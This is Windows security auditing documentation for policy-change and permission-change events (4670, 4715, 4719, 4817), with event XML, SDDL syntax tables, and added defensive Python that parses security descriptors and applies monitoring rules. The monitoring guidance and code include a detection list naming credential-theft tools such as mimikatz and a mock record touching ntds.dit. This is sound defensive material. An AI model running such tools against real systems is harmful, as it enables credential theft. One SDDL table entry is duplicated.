Changing audit settings on an object (for example, modifying the system access control list (SACL) for a file or registry key).

Note SACL change auditing is performed when a SACL for an object has changed and the Policy Change category is configured. Discretionary access control list (DACL) and owner change auditing are performed when Object Access auditing is configured and the object's SACL is set for auditing of the DACL or owner change.

Changing anything in the Special Groups list.


The following events will be enabled with Success auditing in this subcategory:
4902(S): The Per-user audit policy table was created.
4907(S): Auditing settings on object were changed.
4904(S): An attempt was made to register a security event source.
4905(S): An attempt was made to unregister a security event source.
All other events in this subcategory will be logged regardless of the "Audit Policy Change" setting.
Events List:
4715(S): The audit policy (SACL) on an object was changed.
4719(S): System audit policy was changed.
4817(S): Auditing settings on object were changed.
4902(S): The Per-user audit policy table was created.
4906(S): The CrashOnAuditFail value has changed.
4907(S): Auditing settings on object were changed.
4908(S): Special Groups Logon table modified.
4912(S): Per User Audit Policy was changed.
4904(S): An attempt was made to register a security event source.
4905(S): An attempt was made to unregister a security event source.
4670(S): Permissions on an object were changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Registry, Audit Authentication Policy Change, and Audit Authorization Policy Change
Event Description:
This event generates when the permissions for an object are changed. The object could be a file system, registry, or security token object.
This event does not generate if the SACL (Auditing ACL) was changed.
Before this event can generate, certain ACEs might need to be set in the object’s SACL. For example, for a file system object, it generates only if “Change Permissions" and/or "Take Ownership” are set in the object’s SACL. For a registry key, it generates only if “Write DAC" and/or "Write Owner” are set in the object’s SACL.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4670</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T19:36:50.187044600Z" />
<EventRecordID>269529</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x43659</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\Documents\netcat-1.11</Data>
<Data Name="HandleId">0x3f0</Data>
<Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="ProcessId">0xdb0</Data>
<Data Name="ProcessName">C:\Windows\System32\dllhost.exe</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change object’s permissions” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change object’s
permissions” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following table contains the list of the most common Object Types:

Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
permissions were changed. For example, for a file, the path would be included. For Token objects, this field
typically equals “-“.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the permissions were changed. Process ID (PID) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Permissions Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL) value for the object.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

VALUE | DESCRIPTION | VALUE | DESCRIPTION
"AO" | Account operators | "PA" | Group Policy administrators
"RU" | Alias to allow previous Windows 2000 | "IU" | Interactively logged-on user
"AN" | Anonymous logon | "LA" | Local administrator
"AU" | Authenticated users | "LG" | Local guest
"BA" | Built-in administrators | "LS" | Local service account
"BG" | Built-in guests | "SY" | Local system
"BO" | Backup operators | "NU" | Network logon user
"BU" | Built-in users | "NO" | Network configuration operators
"CA" | Certificate server administrators | "NS" | Network service account
"CG" | Creator group | "PO" | Printer operators
"CO" | Creator owner | "PS" | Personal self
"DA" | Domain administrators | "PU" | Power users
"DC" | Domain computers | "RS" | RAS servers group
"DD" | Domain controllers | "RD" | Terminal server users
"DG" | Domain guests | "RE" | Replicator
"DU" | Domain users | "RC" | Restricted code
"EA" | Enterprise administrators | "SA" | Schema administrators
"ED" | Enterprise domain controllers | "SO" | Server operators
"WD" | Everyone | "SU" | Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, Inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, Inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, Child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: Child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: Child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ace.
"IO" - INHERITANCE ONLY: ace doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.

VALUE | DESCRIPTION | VALUE | DESCRIPTION
Generic access rights | | Directory service access rights |
"GA" | GENERIC ALL | "RC" | Read Permissions
"GR" | GENERIC READ | "SD" | Delete
"GW" | GENERIC WRITE | "WD" | Modify Permissions
"GX" | GENERIC EXECUTE | "WO" | Modify Owner
File access rights | | "RP" | Read All Properties
"FA" | FILE ALL ACCESS | "WP" | Write All Properties
"FR" | FILE GENERIC READ | "CC" | Create All Child Objects
"FW" | FILE GENERIC WRITE | "DC" | Delete All Child Objects
"FX" | FILE GENERIC EXECUTE | "LC" | List Contents
Registry key access rights | | "SW" | All Validated Writes
"KA" | KEY ALL ACCESS | "LO" | List Object
"K" | KEY READ | "DT" | Delete Subtree
"KW" | KEY WRITE | "CR" | All Extended Rights
"KX" | KEY EXECUTE | |

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.
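As an added example (not part of the Microsoft documentation), the following Python parses SDDL strings using the entry format, inheritance flags, ACE flags and rights aliases described above, decodes hex rights masks with the table of file access codes from the 4818 section, and diffs the OldSd/NewSd values from the 4670 event XML on this page to flag a new allow ACE that grants write-like rights to a broad trustee. The sets of write-like rights and broad trustees are assumptions made for the detection rule.

```python
"""Parse SDDL from 4670/4715 events and flag risky DACL additions.

Added example, not Microsoft's code. Grammar, flags, rights aliases and
file access mask bits follow the text above; OLD_SD/NEW_SD are the
OldSd/NewSd values from the 4670 event XML on this page.
"""
import re

# File access mask bits from the table of file access codes (4818 section).
FILE_ACCESS_BITS = {
    0x1: "ReadData/ListDirectory", 0x2: "WriteData/AddFile",
    0x4: "AppendData/AddSubdirectory/CreatePipeInstance", 0x8: "ReadEA",
    0x10: "WriteEA", 0x20: "Execute/Traverse", 0x40: "DeleteChild",
    0x80: "ReadAttributes", 0x100: "WriteAttributes", 0x10000: "DELETE",
    0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE", 0x1000000: "ACCESS_SYS_SEC",
}
# Bits that let the holder change data, the DACL or the owner (assumption).
WRITE_MASK = 0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000
# Rights aliases from the rights table with the same effect (assumption).
# "WD" is Modify Permissions in the rights field but Everyone as a trustee.
WRITE_ALIASES = {"GA", "GW", "FA", "FW", "KA", "KW", "WD", "WO", "WP",
                 "SD", "CC", "DC", "DT", "SW", "CR"}
# Broad trustees (assumption): Everyone, Authenticated users, Anonymous,
# Built-in users, Built-in guests.
BROAD_TRUSTEES = {"WD", "AU", "AN", "BU", "BG"}

_ACE_RE = re.compile(r"\(([^)]*)\)")


def _pairs(s):
    """Split a run of two-letter tokens such as 'OICIID' into ('OI','CI','ID')."""
    return tuple(s[i:i + 2] for i in range(0, len(s), 2))


def decode_rights(rights):
    """Named rights for a rights field: hex mask (file bits) or alias string."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for bit, name in FILE_ACCESS_BITS.items() if mask & bit}
    return set(_pairs(rights))


def grants_write(rights):
    """True if the rights field allows modifying data, the DACL or the owner."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & WRITE_MASK)
    return bool(set(_pairs(rights)) & WRITE_ALIASES)


def parse_acl(body):
    """Parse 'inheritance_flags(ace)(ace)...' into (flags, [ace dicts])."""
    head = body.partition("(")[0]
    flags, i = [], 0
    while i < len(head):                       # tokens: P, AI, AR
        tok = head[i:i + 2] if head[i:i + 2] in ("AI", "AR") else head[i]
        if tok not in ("P", "AI", "AR"):       # e.g. NO_ACCESS_CONTROL
            flags.append(head[i:])
            break
        flags.append(tok)
        i += len(tok)
    aces = []
    for inner in _ACE_RE.findall(body):
        # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
        t, f, r, og, iog, sid = inner.split(";")
        aces.append({"type": t, "flags": _pairs(f), "rights": r,
                     "object_guid": og, "inherit_object_guid": iog, "sid": sid})
    return flags, aces


def parse_sddl(sddl):
    """Split an SDDL string into its O:, G:, D: and S: components."""
    out = {"owner": None, "group": None, "dacl": ([], []), "sacl": ([], [])}
    marks = list(re.finditer(r"([OGDS]):", sddl))   # no ':' occurs inside ACEs
    for n, m in enumerate(marks):
        end = marks[n + 1].start() if n + 1 < len(marks) else len(sddl)
        val, key = sddl[m.end():end], m.group(1)
        if key in ("O", "G"):
            out["owner" if key == "O" else "group"] = val
        else:
            out["dacl" if key == "D" else "sacl"] = parse_acl(val)
    return out


def risky_dacl_additions(old_sd, new_sd):
    """ACEs in new_sd but not in old_sd that allow write-like access to a
    broad trustee: the check a 4670 detection rule would run on OldSd/NewSd."""
    old = {tuple(sorted(a.items())) for a in parse_sddl(old_sd)["dacl"][1]}
    return [a for a in parse_sddl(new_sd)["dacl"][1]
            if tuple(sorted(a.items())) not in old
            and a["type"] == "A" and a["sid"] in BROAD_TRUSTEES
            and grants_write(a["rights"])]


# OldSd / NewSd from the 4670 event XML on this page.
OLD_SD = ("D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
          "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)"
          "(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)")
NEW_SD = ("D:ARAI(A;OICI;FA;;;WD)"
          "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)"
          "(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)"
          "(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)")
```

`risky_dacl_additions(OLD_SD, NEW_SD)` returns exactly the new `(A;OICI;FA;;;WD)` entry, that is, Everyone granted File All Access with container and object inheritance.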

Security Monitoring Recommendations


For 4670(S): Permissions on an object were changed.
For token objects, this is typically an informational event, and at the same time it is difficult to identify which token's permissions were changed. For token objects, there are no monitoring recommendations for this event in this document.
For file system and registry objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
If you have critical registry objects for which you need to monitor all modifications (especially permissions
changes and owner changes), monitor for the specific Object\Object Name.
If you have high-value computers for which you need to monitor all changes for all or specific objects (for
example, file system or registry objects), monitor for all 4670 events on these computers. For example, you
could monitor the ntds.dit file on domain controllers.
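As an added example (not Microsoft's own code), the following Python parses the 4670 event XML shown above, taking care of the Security channel's XML namespace, and applies the monitoring recommendations just listed to the extracted EventData. The standard-folder allow-list, the restricted folders, the restricted substrings and the critical object names are constructed assumptions, as is the second, suspicious record.

```python
"""Apply the 4670 monitoring recommendations above to one event record.

Added example, not Microsoft's code. EVENT_4670_XML is the event XML
from this page; the folder allow-list, restricted folders, restricted
substrings and critical objects are constructed assumptions.
"""
import xml.etree.ElementTree as ET

# Default namespace of Security channel events; System and Data live in it.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Rule inputs (assumptions), compared case-insensitively.
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\", "\\temp\\")
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")
CRITICAL_OBJECTS = ("\\ntds.dit",)


def parse_event(xml_text):
    """Return (EventID, Computer, {Data Name: value}) from Security event XML."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.find("e:EventID", NS).text)
    computer = system.find("e:Computer", NS).text
    data = {d.get("Name"): (d.text or "")
            for d in root.find("e:EventData", NS).findall("e:Data", NS)}
    return event_id, computer, data


def check_4670(data, expected_process=None, high_value=False):
    """Return the findings from the recommendations that fire for one record."""
    proc = data.get("ProcessName", "").lower()
    obj = data.get("ObjectName", "").lower()
    findings = []
    if expected_process and proc != expected_process.lower():
        findings.append("Process Name differs from the pre-defined value")
    if not proc.startswith(STANDARD_FOLDERS):
        findings.append("Process Name is outside the standard folders")
    if any(f in proc for f in RESTRICTED_FOLDERS):
        findings.append("Process Name is in a restricted folder")
    if any(s in proc for s in RESTRICTED_SUBSTRINGS):
        findings.append("Process Name contains a restricted substring")
    if any(obj.endswith(c) for c in CRITICAL_OBJECTS):
        findings.append("permissions changed on a critical object")
    if high_value:
        findings.append("4670 on a high-value computer: review the change")
    return findings


# 4670 event XML from this page (Event Viewer's "- " collapse markers removed).
EVENT_4670_XML = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4670</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T19:36:50.187044600Z" />
<EventRecordID>269529</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x43659</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Documents\\netcat-1.11</Data>
<Data Name="HandleId">0x3f0</Data>
<Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="ProcessId">0xdb0</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\dllhost.exe</Data>
</EventData>
</Event>"""

# A constructed second record that trips several rules at once.
SUSPICIOUS_DATA = {
    "ProcessName": "C:\\Users\\bob\\AppData\\Local\\Temp\\mimikatz.exe",
    "ObjectName": "C:\\Windows\\NTDS\\ntds.dit",
}
```

On the page's own record, `check_4670` fires only when the computer is marked high-value or a different pre-defined process name is supplied; the constructed record produces four findings.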
4715(S): The audit policy (SACL) on an object was
changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Policy Change

Event Description:
This event generates every time the local audit policy security descriptor changes.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4715</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-30T19:59:39.964601800Z" />
<EventRecordID>1049425</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="4668" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x11ae30</Data>
<Data Name="OldSd">D:(A;;DCSWRPDTRC;;;BA)(D;;DCSWRPDTRC;;;SY)S:NO_ACCESS_CONTROL</Data>
<Data Name="NewSd">D:(A;;DCSWRPDTRC;;;BA)(A;;DCSWRPDTRC;;;SY)S:NO_ACCESS_CONTROL</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change local audit policy security descriptor (SACL)” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change local audit policy security descriptor (SACL)” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Audit Policy Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the audit policy.
New Security Descriptor [Type = UnicodeString]: new Security Descriptor Definition Language (SDDL) value for the audit policy.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example and syntax: the SDDL example, the table of reserved SID values, the DACL/SACL entry format, and the rights table are the same as those given for event 4670 above, which also lists the reference links for SDDL syntax.

Security Monitoring Recommendations


For 4715(S): The audit policy (SACL) on an object was changed.
Monitor for all events of this type, especially on high value assets or computers, because any change of the local audit policy security descriptor should be planned. If this action was not planned, investigate the reason for the change.
4719(S): System audit policy was changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates when the computer's audit policy changes.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4719</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-30T19:57:09.668217100Z" />
<EventRecordID>1049418</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="4668" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="CategoryId">%%8274</Data>
<Data Name="SubcategoryId">%%12807</Data>
<Data Name="SubcategoryGuid">{0CCE9223-69AE-11D9-BED3-505054503030}</Data>
<Data Name="AuditPolicyChanges">%%8448, %%8450</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made a change to local audit policy. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to local audit policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Audit Policy Change:
Category: the name of the auditing Category whose Subcategory was changed. Possible values:
Account Logon
Account Management
Detailed Tracking
DS Access
Logon/Logoff
Object Access
Policy Change
Privilege Use
System
Subcategory: the name of the auditing subcategory that was changed. Possible values:

Credential Validation | Process Termination | Network Policy Server
Kerberos Authentication Service | RPC Events | Other Logon/Logoff Events
Kerberos Service Ticket Operations | Detailed Directory Service Replication | Special Logon
Other Logon/Logoff Events | Directory Service Access | Application Generated
Application Group Management | Directory Service Changes | Certification Services
Computer Account Management | Directory Service Replication | Detailed File Share
Distribution Group Management | Account Lockout | File Share
Other Account Management Events | IPsec Extended Mode | File System
Security Group Management | IPsec Main Mode | Filtering Platform Connection
User Account Management | IPsec Quick Mode | Filtering Platform Packet Drop
DPAPI Activity | Logoff | Handle Manipulation
Process Creation | Logon | Kernel Object
Other Object Access Events | Filtering Platform Policy Change | IPsec Driver
Registry | MPSSVC Rule-Level Policy Change | Other System Events
SAM | Other Policy Change Events | Security State Change
Policy Change | Non-Sensitive Privilege Use | Security System Extension
Authentication Policy Change | Sensitive Privilege Use | System Integrity
Authorization Policy Change | Other Privilege Use Events | Plug and Play Events
Group Membership | |

Subcategory GUID: the unique subcategory GUID. To see Subcategory GUIDs you can use this command:
auditpol /list /subcategory:* /v.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Changes: the changes that were made for “Subcategory”. Possible values:
Success removed
Failure removed
Success added
Failure added
It can also be a combination of the items above, separated by commas.

Security Monitoring Recommendations
For 4719(S): System audit policy was changed.
Monitor for all events of this type, especially on high value assets or computers, because any change in local
audit policy should be planned. If this action was not planned, investigate the reason for the change.
4817(S): Auditing settings on object were changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates when the Global Object Access Auditing policy is changed on a computer.
Separate events will be generated for “Registry” and “File system” policy changes.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4817</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-10T01:26:33.191368500Z" />
<EventRecordID>1192270</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="3048" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="ObjectServer">LSA</Data>
<Data Name="ObjectType">Global SACL</Data>
<Data Name="ObjectName">Key</Data>
<Data Name="OldSd" />
<Data Name="NewSd">S:(AU;SA;RC;;;S-1-5-21-3457937927-2839227994-823803824-1104)</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that made a change to Global Object Access Auditing policy. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to Global Object
Access Auditing policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
